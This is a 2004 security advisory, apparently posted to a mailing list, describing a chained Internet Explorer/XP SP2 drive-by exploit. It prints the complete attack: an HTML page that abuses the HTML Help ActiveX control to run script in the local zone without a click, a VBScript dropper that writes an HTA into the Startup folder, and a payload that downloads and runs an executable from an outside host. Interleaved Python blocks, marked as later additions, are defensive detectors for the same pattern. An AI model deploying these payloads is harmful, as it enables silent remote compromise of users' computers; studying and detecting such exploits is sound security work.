Did they really do a good job on Service Pack 2? Was it worth the investment that's reported to be more than the missile defense system? Do all these articles on the great achievement by Microsoft and XP SP2 really have merit? They totally forgot HTA files and HTM help files. Who knows what else.

"Microsoft SP2 team, that is unacceptable, YOU'RE FIRED." Donald Trump

http://freehost07.websamba.com/greyhats/sp2rc-analysis.htm
Microsoft Internet Explorer XP SP2 Fully Automated Remote Compromise
Dec 21, 2004

Vulnerable
----------
- Microsoft Internet Explorer 6.0
- Microsoft Windows XP Pro SP2
- Microsoft Windows XP Home SP2

Not Tested
----------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x
- Microsoft Windows 2003 Server

Severity
--------
Critical - Remote code execution, no user intervention
Intro
-----
Although hundreds of millions of dollars have been spent on securing SP2, perfection is impossible. Through the joint effort of Michael Evanchik (http://www.michaelevanchik.com) and Paul from Greyhats Security (http://greyhats.cjb.net), a very critical vulnerability has been developed that can compromise a user's system without the need for any user interaction besides visiting the malicious page. The vulnerability is not actually a single vulnerability in itself; rather, it chains multiple known holes in SP2, including the Help ActiveX Control Related Topics Zone Security Bypass Vulnerability and the Help ActiveX Control Related Topics Cross Site Scripting Vulnerability. Why Microsoft has still not patched two of these known vulnerabilities, which have been out for almost half a year now, is beyond me.
Tech Stuff and Explanation
--------------------------
1. Create a webpage with the following code:

sp2rc.htm
---------------------------------------------------------------------
<OBJECT id="localpage" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://freehost07.websamba.com/greyhats/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
---------------------------------------------------------------------
Explanation of above code:

The first object (id: localpage) tells hhctrl.ocx to open a help popup window at the location C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm. This file was chosen because it is treated as the local zone and it doesn't have any script of its own that would interfere. On some computers an error is shown before the popup. This is the user's only chance to prevent the vulnerability from working: if Internet Explorer were closed at this point, the user would be safe.

The second object (id: inject) tells the help popup to navigate to a javascript: URL, which executes in the context of that local-zone page. Thus, cross site scripting has just taken place. A script tag that loads a remote file is written into the page, and writehta.txt (below) is executed in the unsecured local zone.

In the script, HHClick can be used to automate the vulnerability. This is more effective than the previously described method of requiring a user to click on a button.
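A content-side check for the pattern the two objects above rely on, added here as an example and not part of the advisory: it parses HTML (say, at a proxy or mail gateway) for hhctrl.ocx objects whose Related Topics item points at a file:// or javascript: target, and notes whether page script calls HHClick() to fire them without a click. The CLSID is the one from sp2rc.htm; SAMPLE is a constructed input with the injected payload elided.

```python
from html.parser import HTMLParser

HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"  # hhctrl.ocx, as in sp2rc.htm

class HHCtrlScanner(HTMLParser):
    # Collects hhctrl.ocx objects whose "Related Topics" item targets a script or
    # file: URL (the zone-bypass / XSS pattern above) and all inline script text.
    def __init__(self):
        super().__init__()
        self.obj, self.in_script = None, False
        self.findings, self.script_text = [], []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object" and HHCTRL_CLSID in a.get("classid", "").lower():
            self.obj = {"id": a.get("id", "?"), "command": "", "items": []}
        elif tag == "param" and self.obj is not None:
            name = a.get("name", "").lower()
            if name == "command":
                self.obj["command"] = a.get("value", "")
            elif name.startswith("item"):
                self.obj["items"].append(a.get("value", ""))
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "object" and self.obj is not None:
            if "related topics" in self.obj["command"].lower():
                for item in self.obj["items"]:  # values look like "command;<target>"
                    target = item.split(";", 1)[-1].strip().lower()
                    if target.startswith(("javascript:", "vbscript:", "file:")):
                        self.findings.append((self.obj["id"], target.split(":", 1)[0]))
            self.obj = None
        elif tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script_text.append(data)

def scan_html(html):
    """Return (findings, auto): risky (object id, scheme) pairs, and whether page
    script calls HHClick(), i.e. the popup fires without the user clicking."""
    p = HHCtrlScanner()
    p.feed(html)
    return p.findings, "HHClick(" in "".join(p.script_text)

# Constructed input: the two sp2rc.htm objects with the injected payload elided.
SAMPLE = """<OBJECT id="localpage" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM name="Command" value="Related Topics, MENU"><PARAM name="Item1" value="command;file://C:\\WINDOWS\\PCHealth\\HelpCtr\\System\\blurbs\\tools.htm"></OBJECT>
<OBJECT id="inject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Item1" value='command;javascript:execScript("ELIDED")'></OBJECT><script>localpage.HHClick(); setTimeout("inject.HHClick()",100);</script>"""
```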
2. Writehta.txt uses an ADODB recordset to write Microsoft Office.hta to the user's startup folder. See Michael Evanchik's analysis of the drag and drop vulnerability for an explanation of ADODB recordsets. It is also reported that an ADODB recordset can be built locally, without using an HTTP or FTP server, like the one below.

writehta.txt
---------------------------------------------------------------------
' Text-driver ODBC connection whose "database" is a remote HTTP host
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.malware.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs = CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
' Persist the fetched recordset as XML into the All Users Startup folder
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close
window.close
---------------------------------------------------------------------
3. f00bar.txt (thanks malware for hosting this file) is the file requested by the ADODB recordset (again, read the drag and drop analysis at www.michaelevanchik.com for an explanation of how this works and why f00bar.txt looks the way it does). Because there is absolutely no limit on what you can do in an HTA file, an old yet effective method of requesting a file and saving it to the user's hard disk is used. From that, a WScript shell is created and used to run the program. And now, ladies and gentlemen, we have compromised the user's machine.

f00bar.txt
---------------------------------------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://freehost07.websamba.com/greyhats/malware.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\malware.exe"",2 : crap="""
""" : Set ws = CreateObject(""WScript.Shell"") : crap="""
""" : ws.Run ""C:\malware.exe"", 3, FALSE : crap="""
"""</script> crap="""
---------------------------------------------------------------------
4. Upload hhctrl.ocx for the computers that don't happen to have this control. All XPs seem to have it by default; some Win2k3s do not (according to Michael Evanchik).
Proof of Concept?
-----------------
- http://freehost07.websamba.com/greyhats/sp2rc.htm
- If an error is shown, press OK. This is normal.
- Notice in your Startup menu a new file called Microsoft Office.hta. When run, this file will download and launch a harmless executable (which includes a pretty neat fire animation).
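A host-side hunt for the artifact that steps 2 and 3 leave behind, added as an example and not part of the advisory: it lists every .hta in a Startup folder and tags which parts of the XMLHTTP / ADODB.Stream / WScript.Shell chain its body contains. The XP path is the one writehta.txt writes to; the later-Windows path, the indicator names and SAMPLE_HTA are my assumptions and constructed inputs.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators of the download-and-run chain in the page's HTA payload:
# fetch via XMLHTTP, write via ADODB.Stream, launch via WScript.Shell.
INDICATORS = {
    "xmlhttp": re.compile(r"xmlhttp", re.I),
    "adodb_stream": re.compile(r"adodb\.stream", re.I),
    "savetofile": re.compile(r"\.savetofile\b", re.I),
    "wscript_shell": re.compile(r"wscript\.shell", re.I),
}
# All Users Startup folder on XP (the path writehta.txt targets) and on later Windows (assumed).
DEFAULT_STARTUP_DIRS = [
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
]
def classify_hta(text):
    """Sorted names of the download-and-run indicators found in an HTA body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def hunt_startup_dir(directory):
    """Report every .hta in a Startup folder as (name, matched indicators); any .hta
    there deserves a look, and one matching the whole chain is this advisory's artifact."""
    findings = []
    for path in sorted(Path(directory).iterdir()):
        if path.is_file() and path.suffix.lower() == ".hta":
            body = path.read_text(encoding="latin-1", errors="replace")
            findings.append((path.name, classify_hta(body)))
    return findings

# Constructed sample: the page's VBScript chain with the download URL and binary name elided.
SAMPLE_HTA = """<html><script language="vbscript">
Set o = CreateObject("msxml2.XMLHTTP")
Set s = CreateObject("adodb.stream"): s.savetofile "C:\\ELIDED.exe", 2
Set ws = CreateObject("WScript.Shell")
</script></html>"""
def demo():
    """Hunt a throwaway Startup folder holding the sample HTA plus a benign file."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "Microsoft Office.hta").write_text(SAMPLE_HTA)
        Path(d, "desktop.ini").write_text("[.ShellClassInfo]")
        return hunt_startup_dir(d)

if __name__ == "__main__":
    print(demo())
    for d in (d for d in DEFAULT_STARTUP_DIRS if os.path.isdir(d)):
        print(d, hunt_startup_dir(d))
```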
Vendor Recommendations
----------------------
- Like Michael Evanchik said in his previous analysis, Microsoft needs to apply XP Service Pack 2's local zone lockdown to .HTA files and HTML Help (.chm) files as well.
- This might be a little farfetched, but it would solve a lot of problems: take out the startup folder and only support running files during startup through the registry. The startup folder is a major part of this vulnerability and I can almost guarantee it will be used for another remote compromise.
- Microsoft could possibly take HTA files out altogether. I have not seen them used for anything beyond hacking.
- No vulnerability is too small or too insignificant to be taken seriously. Treat every vulnerability as if it could be dangerous.
User Recommendations
--------------------
- Disable HTA files.
- Get yourself antivirus software. I recommend Symantec because once they get their lazy asses off the couch and fix some of this stuff you will be a lot better off.
- Disable active scripting in Internet Explorer. If nothing else, do this.
- Do not use Internet Explorer; use Mozilla Firebird (now known as Firefox, www.mozilla.org).
Credit
------
Paul from Greyhats
Michael Evanchik
Http equiv (thanks for allowing me to use your server for f00bar.txt)

Greets
------
- Liu Die Yu (all the work you've done is amazing)

Contact
-------
paul@greyhats.cjb.net
http://greyhats.cjb.net

Note
----
Greyhats is becoming bigger and is in need of an upgrade. If anyone is interested in donating some webspace and a domain name I would be very appreciative. Contact me so that we may work something out :)

Michael Evanchik
Relationship1
p: 914-921-4400
f: 914-921-6007
mailto:mevanchik@relationship1.com
web: http://www.relationship1.com